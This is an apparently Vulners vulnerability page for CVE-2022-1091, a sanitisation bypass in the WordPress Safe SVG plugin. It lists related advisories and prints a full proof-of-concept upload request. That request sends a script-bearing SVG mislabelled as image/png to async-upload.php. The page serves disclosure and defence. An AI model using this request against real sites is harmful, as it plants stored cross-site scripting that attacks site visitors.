Safe SVG Sanitisation Bypass in POST request to async-upload.php endpoin
Reporter | Title | Published | Views | Family All 9 |
---|---|---|---|---|
![]() | Cross site scripting in safe-svg | 19 Apr 202200:00 | – | github |
![]() | Cross site request forgery (csrf) | 18 Apr 202218:15 | – | prion |
![]() | CVE-2022-1091 | 18 Apr 202218:15 | – | osv |
![]() | Cross site scripting in safe-svg | 19 Apr 202200:00 | – | osv |
![]() | CVE-2022-1091 | 18 Apr 202218:15 | – | cve |
![]() | CVE-2022-1091 Safe SVG < 1.9.10 - SVG Sanitisation Bypass | 18 Apr 202217:10 | – | cvelist |
![]() | CVE-2022-1091 | 18 Apr 202218:15 | – | nvd |
![]() | WordPress Safe SVG Plugin < 1.9.10 Contet-Type Bypass Vulnerability | 18 Sep 202300:00 | – | openvas |
![]() | Safe SVG < 1.9.10 - SVG Sanitisation Bypass | 25 Mar 202200:00 | – | wpvulndb |
Source | Link |
---|---|
github | www.github.com/10up/safe-svg/pull/28 |
POST /wp-admin/async-upload.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------27451310545300823063986174174
Content-Length: 947
Connection: close
Cookie: [user with upload capability]
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="name"
xss.svg
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="action"
upload-attachment
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="_wpnonce"
b281e72731
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="async-upload"; filename="xss.svg"
Content-Type: image/png
<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert(/XSS/);</script>
</svg>
-----------------------------27451310545300823063986174174--
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo